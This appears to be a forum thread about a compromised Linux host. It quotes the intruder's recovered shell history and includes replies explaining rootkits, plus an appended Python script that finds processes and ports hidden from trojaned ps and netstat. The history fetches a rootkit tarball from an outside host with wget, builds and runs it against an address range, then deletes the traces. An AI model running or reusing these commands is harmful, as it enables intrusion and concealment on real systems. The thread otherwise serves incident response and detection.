Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunately I have not lost any important data. But first the proof that I have been hacked.
/var/log/messages
(This is the first line)
Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
There are tools available for crackers to clean up logs after a break-in .... it might be possible that your *cracker* also ran some kind of tool to remove logs
cd /dev/ida/.sys/trojan
wget www.geocities.com/master0n/bestwu.tgz
tar zxvf bestwu.tgz
cd aw
make
./awu 24.132
cd ..
lsd
ls
rm -rf aw bestwu.tgz
This is a rootkit..... To check which rootkit was installed on your machine visit
netstat -a, ps ax are not working since
These files are replaced with trojaned ones by the rootkit ... so there is a possibility that they show you wrong results or malfunction ...
Please help me to find the person who did this. Thanks in advance.
forensic analysis .....
regards Ranjeet
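As an added illustration of the point in the reply above (example code, not from the thread): a trojaned ps or netstat can only lie about what it prints, so comparing its output with the kernel's own view in /proc exposes whatever it omits. The ps, netstat and /proc samples below are constructed; a kernel-module rootkit that filters /proc itself would not be caught this way, and on an RPM-based host `rpm -V procps net-tools` is the complementary integrity check.

```python
import os
import subprocess

# Constructed samples standing in for a compromised host; not from the post.
PS_SAMPLE = "1\n2\n815\n"                 # what a trojaned `ps -e -o pid=` prints
PROC_PIDS_SAMPLE = {1, 2, 815, 4242}     # what the kernel exposes under /proc
PROC_NET_TCP_SAMPLE = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1 1\n"
    "   1: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 2 1\n"
)
NETSTAT_SAMPLE = (
    "Proto Recv-Q Send-Q Local Address           Foreign Address         State\n"
    "tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN\n"
)

def pids_from_proc(proc_root="/proc"):
    """PIDs the kernel exposes as numeric directory names under /proc."""
    return {int(d) for d in os.listdir(proc_root) if d.isdigit()}

def pids_from_ps(ps_output):
    """PIDs reported by the userland ps binary (output of `ps -e -o pid=`)."""
    return {int(tok) for tok in ps_output.split() if tok.isdigit()}

def listening_ports_from_proc(proc_net_tcp):
    """LISTEN sockets from /proc/net/tcp: local port is hex, state 0A means LISTEN."""
    ports = set()
    for line in proc_net_tcp.splitlines()[1:]:      # skip the header row
        fields = line.split()
        if len(fields) > 3 and fields[3] == "0A":
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports

def listening_ports_from_netstat(netstat_output):
    """LISTEN sockets as the userland netstat binary reports them (`netstat -ant`)."""
    ports = set()
    for line in netstat_output.splitlines():
        fields = line.split()
        if fields and fields[0].startswith("tcp") and fields[-1] == "LISTEN":
            ports.add(int(fields[3].rsplit(":", 1)[1]))
    return ports

def hidden(kernel_view, userland_view):
    """Anything the kernel knows about that the userland tool omits is suspicious."""
    return sorted(kernel_view - userland_view)

if __name__ == "__main__":
    ps_out = subprocess.run(["ps", "-e", "-o", "pid="], capture_output=True, text=True).stdout
    ns_out = subprocess.run(["netstat", "-ant"], capture_output=True, text=True).stdout
    with open("/proc/net/tcp") as f:
        proc_tcp = f.read()
    print("PIDs hidden from ps:", hidden(pids_from_proc(), pids_from_ps(ps_out)))
    print("ports hidden from netstat:",
          hidden(listening_ports_from_proc(proc_tcp), listening_ports_from_netstat(ns_out)))
```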